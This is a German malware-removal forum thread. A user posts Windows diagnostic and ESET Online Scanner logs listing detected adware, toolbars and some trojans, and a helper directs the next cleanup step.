by C:\Program Files (x86)\securityutility\securityutility\2.0.0.1\Security Utilityupdt.exe
7200(0)(0)
7595(0)(0)
7005(0)(0)
7004(0)(0)
5006(0)(0)
5004(0)(0)
5003(0)(0)
5002(0)(1)
Error: (02/06/2016 07:17:21 PM) (Source: McLogEvent) (EventID: 5051) (User: NT-AUTORITÄT)
Description: C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe900006344 (0x18c8)0x000007FAFDB42EDA
Build VSCORE.15.1.0.461 / 5500.1093
Object being scanned = \Device\HarddiskVolume4\WINDOWS\SysWOW64\wbem\wmiutils.dll
by C:\WINDOWS\SysWOW64\wscript.exe
4(1422)(0)
4(1422)(0)
7200(0)(0)
7595(0)(0)
7005(0)(0)
7004(0)(0)
5006(0)(0)
5004(0)(0)
Error: (02/06/2016 04:45:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: upgmsd_de_005010228.exe, Version: 1.0.0.1, Zeitstempel: 0x56b3301a
Name des fehlerhaften Moduls: upgmsd_de_005010228.exe, Version: 1.0.0.1, Zeitstempel: 0x56b3301a
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0001bb40
ID des fehlerhaften Prozesses: 0x11b4
Startzeit der fehlerhaften Anwendung: 0xupgmsd_de_005010228.exe0
Pfad der fehlerhaften Anwendung: upgmsd_de_005010228.exe1
Pfad des fehlerhaften Moduls: upgmsd_de_005010228.exe2
Berichtskennung: upgmsd_de_005010228.exe3
Vollständiger Name des fehlerhaften Pakets: upgmsd_de_005010228.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: upgmsd_de_005010228.exe5
Error: (02/06/2016 04:34:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DeskBar.exe, Version: 2.8.9.113, Zeitstempel: 0x565d69c3
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x030cc5d6
ID des fehlerhaften Prozesses: 0x1b70
Startzeit der fehlerhaften Anwendung: 0xDeskBar.exe0
Pfad der fehlerhaften Anwendung: DeskBar.exe1
Pfad des fehlerhaften Moduls: DeskBar.exe2
Berichtskennung: DeskBar.exe3
Vollständiger Name des fehlerhaften Pakets: DeskBar.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: DeskBar.exe5
Systemfehler:
=============
Error: (02/08/2016 12:29:40 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Der Dienst "McAfee Home Network" wurde nicht richtig gestartet.
Error: (02/08/2016 12:25:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Ofelje" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (02/08/2016 12:24:02 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: Der Dienst Windows Update konnte nach dem Empfang eines Preshutdown-Steuerelements nicht richtig heruntergefahren werden.
Error: (02/08/2016 12:15:18 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Ofelje" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2
Error: (02/08/2016 12:14:04 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: Der Dienst Windows Update konnte nach dem Empfang eines Preshutdown-Steuerelements nicht richtig heruntergefahren werden.
Error: (02/08/2016 12:12:54 AM) (Source: DCOM) (EventID: 10010) (User: Haus)
Description: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
Error: (02/08/2016 12:06:52 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (02/08/2016 12:06:52 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (02/08/2016 12:06:52 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (02/08/2016 12:06:52 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "PEVSystemStart" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
CodeIntegrity:
===================================
Date: 2016-02-07 20:46:41.082
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:46:41.051
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:45:44.503
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:45:44.472
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:45:06.932
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:45:06.895
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:44:54.583
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:44:54.549
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:43:21.111
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-07 20:43:21.080
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 3911.27 MB
Verfügbarer physikalischer RAM: 2660.17 MB
Summe virtueller Speicher: 7495.27 MB
Verfügbarer virtueller Speicher: 6236.36 MB
==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:443.25 GB) (Free:365.73 GB) NTFS
Drive e: () (Removable) (Total:7.46 GB) (Free:6.67 GB) FAT32
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 4A77DF1C)
Partition: GPT.
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Ende von Addition.txt ============================
|
|
08.02.2016, 11:22
| #8 |
| /// TB-Ausbilder /// Anleitungs-Guru | Windows 8.x mit einer großen Auswahl an Schädlingen Jetzt bitte Suchscan durchführen: Schritt 1 ESET Online Scanner
__________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer |
|
09.02.2016, 15:33
| #9 |
| | Windows 8.x mit einer großen Auswahl an SchädlingenCode:
ATTFilter # country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28030
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=ebdcc1819449fe46869de9f6d261bb43
# end=updated
# utc_time=2016-02-08 04:45:38
# local_time=2016-02-08 05:45:38 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# osver=6.2.9200 NT
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=ebdcc1819449fe46869de9f6d261bb43
# end=init
# utc_time=2016-02-09 11:37:13
# local_time=2016-02-09 12:37:13 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28042
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=ebdcc1819449fe46869de9f6d261bb43
# end=updated
# utc_time=2016-02-09 11:37:58
# local_time=2016-02-09 12:37:58 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=ebdcc1819449fe46869de9f6d261bb43
# engine=28042
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-02-09 01:59:37
# local_time=2016-02-09 02:59:37 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 759164 114532488 0 0
# scanned=481560
# found=73
# cleaned=0
# scan_time=8499
sh=38CD21F1FB5372EB0563895E68C1C48234BD5BCA ft=1 fh=8c1508fe13f93e8d vn="Variante von Win32/Toolbar.Perion.AC evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\shopperz010220161759\Pujfokli.dll.vir"
sh=2DBC0FE0EEE0F311FE76BAE090D1FC76AC4CB87F ft=1 fh=de8db17d850e096b vn="Variante von Win64/Toolbar.Perion.L evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\shopperz010220161759\Pujfokli64.dll.vir"
sh=307526ABD6457625E986D2EC0D0BF35099321173 ft=1 fh=b5cfbc5e7ca403d1 vn="Variante von MSIL/Agent.AGE Trojaner" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SOUND+\idscservice.exe.vir"
sh=3D09965483EEDB5FB77B45432A6206D3F5C9F57A ft=1 fh=c71c0011cc4f3b2a vn="Variante von Win32/BubbleSound.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SOUND+\Sound+.exe.vir"
sh=4F8737C92F9376FE74616640E4422E9CDB4F7386 ft=1 fh=3df4d47fb4c43f1d vn="Variante von Win64/BubbleSound.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SOUND+\SoundP.dll.vir"
sh=F7526E1A1AFAECA390F9DC3A37683CC4F91AAEA7 ft=1 fh=c71c001157d1f5fa vn="Variante von Win32/Adware.ConvertAd.ACL Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp.vir"
sh=352FEB9EB456A986FD500D129709ED0159852DED ft=1 fh=04c5ffd1c154d146 vn="Variante von Win32/Adware.ConvertAd.ABN Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp.vir"
sh=84577AB29BE884AEF26BC9E4F179C37D9DF936DC ft=1 fh=29be6c0e792c7222 vn="Variante von Win32/Adware.ConvertAd.AFP Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs.vir"
sh=8CE69ADD85B8A9A12009F6DF065000B3671E4D1B ft=1 fh=7f01c8aa331dac85 vn="Variante von Win32/Adware.ConvertAd.AFV Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\rnsf116B.exe.vir"
sh=F5C125C38FEA94220762A658B15022860B514D86 ft=1 fh=6615b57b82bba695 vn="Mehrere Bedrohungen" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275\vnsf774.tmp.vir"
sh=F7526E1A1AFAECA390F9DC3A37683CC4F91AAEA7 ft=1 fh=c71c001157d1f5fa vn="Variante von Win32/Adware.ConvertAd.ACL Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275\hnsn36D.tmp.vir"
sh=352FEB9EB456A986FD500D129709ED0159852DED ft=1 fh=04c5ffd1c154d146 vn="Variante von Win32/Adware.ConvertAd.ABN Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275\jnsgE776.tmp.vir"
sh=ABAA099374D3E8D190EDD176110288CC44D88999 ft=1 fh=23590eee6c3214d0 vn="Variante von Win32/Adware.ConvertAd.AFP Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275\knsvCAC1.tmpfs.vir"
sh=8878A3A72D93E7D6662BAF487778DDFCD9EAE6C2 ft=1 fh=7ba129118f364bcf vn="Variante von Win32/Adware.ConvertAd.AFW Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275\rnsdDFD1.exe.vir"
sh=C5F891E6634C6DAEE6717D607825332DCD85D90F ft=1 fh=097fec4abf643fed vn="Mehrere Bedrohungen" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275\vnslB3F9.tmp.vir"
sh=BCCA66848E82E6150A03B3A48414102284CE17DE ft=1 fh=8ee395ec8e665c24 vn="Variante von Win32/Adware.CognosAds.E Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe.vir"
sh=2BD0153E1FC28B5A8CA2E0E92D4AD7996964E3DE ft=1 fh=b00ca6e50cd837fb vn="Variante von Win32/RiskWare.Komodia.G Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\QuickSearch\poz.exe.vir"
sh=D6E1013F5DB516CE8E5BDCBA0FA95657109A26C5 ft=1 fh=93d68f56c014ec80 vn="Variante von Win32/ELEX.GN evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\SFK\SSFK.exe.vir"
sh=AFE3F0B53FFA87DCBCE9EA8EE45324196280B946 ft=1 fh=7a5926c2e3fdb07d vn="Variante von Win32/Adware.MaxDriver.A Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\SpaceSondPro_v53.12571\ioproduct.exe.vir"
sh=619754C16E9C48A87362C2602DE4F1E665C1D094 ft=1 fh=455a89b0b1b7b239 vn="Variante von Win32/Adware.ConvertAd.ACA.gen Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\8FB.tmp.vir"
sh=619754C16E9C48A87362C2602DE4F1E665C1D094 ft=1 fh=455a89b0b1b7b239 vn="Variante von Win32/Adware.ConvertAd.ACA.gen Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\ED45.tmp.vir"
sh=C6E310F6E780160B817AF2F7CE3D416BB800585F ft=1 fh=04e9c0f8fc34af3e vn="Win32/Adware.ConvertAd.AGE Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\onscEFCC.tmp.vir"
sh=0F5363D7EC1502CE4AD298C7B3B8EC776CED9E3C ft=1 fh=bf28f9153f80c234 vn="Variante von Win32/Adware.ConvertAd.AER.gen Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\pnssEFDD.exe.vir"
sh=8CE69ADD85B8A9A12009F6DF065000B3671E4D1B ft=1 fh=7f01c8aa331dac85 vn="Variante von Win32/Adware.ConvertAd.AFV Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\rnscEFCB.exe.vir"
sh=D986331EA5966DECC506CFED916F1495D6E6E9A3 ft=1 fh=811047ad3ebe7589 vn="Variante von Win32/Adware.ConvertAd.ACK Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp.vir"
sh=4D19A0B788DDE8240FC11243A5126F0A821360CD ft=1 fh=83584f3cf5282053 vn="Variante von Win32/Adware.ConvertAd.AEX Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275\nsu8013.tmp.vir"
sh=C6E310F6E780160B817AF2F7CE3D416BB800585F ft=1 fh=04e9c0f8fc34af3e vn="Win32/Adware.ConvertAd.AGE Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275\onsg63F8.tmp.vir"
sh=0F5363D7EC1502CE4AD298C7B3B8EC776CED9E3C ft=1 fh=bf28f9153f80c234 vn="Variante von Win32/Adware.ConvertAd.AER.gen Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275\pnsg63F9.exe.vir"
sh=8878A3A72D93E7D6662BAF487778DDFCD9EAE6C2 ft=1 fh=7ba129118f364bcf vn="Variante von Win32/Adware.ConvertAd.AFW Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275\rnsg63F7.exe.vir"
sh=D986331EA5966DECC506CFED916F1495D6E6E9A3 ft=1 fh=811047ad3ebe7589 vn="Variante von Win32/Adware.ConvertAd.ACK Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275\snsg63F6.tmp.vir"
sh=764A021A60890EC6E7156C8AE5D9EC34A909A40C ft=1 fh=c71c001131ef779a vn="Variante von Win32/Adware.ConvertAd.AEX Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\B5B53C54-1454881735-E111-8F5D-B888E3A0B275\qnsj701F.tmp.vir"
sh=FFFEB0240A2C6DB190EA1DD7315EBDDD07F57771 ft=1 fh=f1d0002b177fe066 vn="Variante von Win32/Clonium.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\BoBrowser\Application\45.0.2454.131\chrome.dll.vir"
sh=BCEFBD04756715EBDBEFA3B7BE1D65630FD73762 ft=1 fh=d5a95eca340fe7c0 vn="Win32/Adware.Snoozer.T Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Local\ext_funfeedr\ext_funfeedr.dll.vir"
sh=C5F891E6634C6DAEE6717D607825332DCD85D90F ft=1 fh=097fec4abf643fed vn="Mehrere Bedrohungen" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\ASPackage\ASPackage.exe.vir"
sh=38652A0F01C608D6EE453F134592DA9A47C8B6BB ft=1 fh=360cbd05fcc46763 vn="Variante von Win32/Adware.Snoozer.T Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Genius\Genius.exe.vir"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com\chrome\content\index.html.vir"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js.vir"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js.vir"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js.vir"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js.vir"
sh=25A789BFC199A9C84F95079EE940BBD5C78CB4EC ft=0 fh=0000000000000000 vn="Win32/Toolbar.TNT2.I evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com\chrome\content\jquery-2.1.0.min.js.vir"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com\chrome\content\index.html.vir"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js.vir"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js.vir"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js.vir"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js.vir"
sh=25A789BFC199A9C84F95079EE940BBD5C78CB4EC ft=0 fh=0000000000000000 vn="Win32/Toolbar.TNT2.I evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com\chrome\content\jquery-2.1.0.min.js.vir"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com\chrome\content\index.html.vir"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js.vir"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js.vir"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js.vir"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js.vir"
sh=25A789BFC199A9C84F95079EE940BBD5C78CB4EC ft=0 fh=0000000000000000 vn="Win32/Toolbar.TNT2.I evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\yahooprotected@gmail.com\chrome\content\jquery-2.1.0.min.js.vir"
sh=8B086B7F5DC29519468B78E1BCCB59A3F1D2865A ft=1 fh=0502b1abd645cdeb vn="Variante von Win32/Adware.Snoozer.K Anwendung" ac=I fn="C:\Users\Manz\AppData\Roaming\GeniusCache\4bdce3f1b2145e2d983a6c50c27b2d5931d7b158"
sh=35C96F72A5D6A44FCE7CE68DF1BCAF7B48350091 ft=1 fh=a22e4ae349e54c97 vn="Variante von Win32/Speedchecker.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Manz\Documents\PCSU_Update.exe"
sh=246DDBC3A2C223A6B9072637D93DC2A2832D097A ft=1 fh=c71c0011b04f613a vn="Win32/Toolbar.Babylon.Y evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\ProgramData\DSearchLink\DSearchLink.exe"
sh=6E58AF619D13A6BCCB7A0B475115452AEAFF6FB1 ft=1 fh=2dbdc7e59531f5e8 vn="Variante von Win32/ELEX.GY evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Microsoft\Windows\INetCache\IE\1YHFT9RF\Wallpaper[1].exe"
sh=1E38D97D5D558B4F08BD015FEBE327D7A050ED9B ft=1 fh=ae245d4a52d8b63b vn="Variante von Win32/ReImageRepair.J evtl. unerwünschte Anwendung" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Microsoft\Windows\INetCache\IE\FDCVSBPB\ProtectorPackage2007x64d[1].exe"
sh=33738F768B26C77DFDE153422D75519EAE713EB3 ft=0 fh=0000000000000000 vn="Variante von Win32/Injector.CILC Trojaner" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Temp\Ausgleich nicht gedeckten Buchung Ihrer Bestellung Online Pay GmbH-1.zip"
sh=33738F768B26C77DFDE153422D75519EAE713EB3 ft=0 fh=0000000000000000 vn="Variante von Win32/Injector.CILC Trojaner" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Temp\Ausgleich nicht gedeckten Buchung Ihrer Bestellung Online Pay GmbH.zip"
sh=6042BAAB22E8A646515097D62B575D7A613ED9BE ft=0 fh=0000000000000000 vn="Variante von Win32/Kryptik.DXSC Trojaner" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Temp\Ausgleich stornierten Zahlung Ihrer Bestellung GiroPay AG.zip"
sh=43384D99FC7C2C56513070D39FA39812F018478E ft=0 fh=0000000000000000 vn="Win32/Trustezeb.K Trojaner" ac=I fn="C:\Windows.old\Users\Manz\AppData\Local\Temp\Forderung nicht gedeckten Buchung Ihrer Bestellung Amazon GmbH-1.zip"
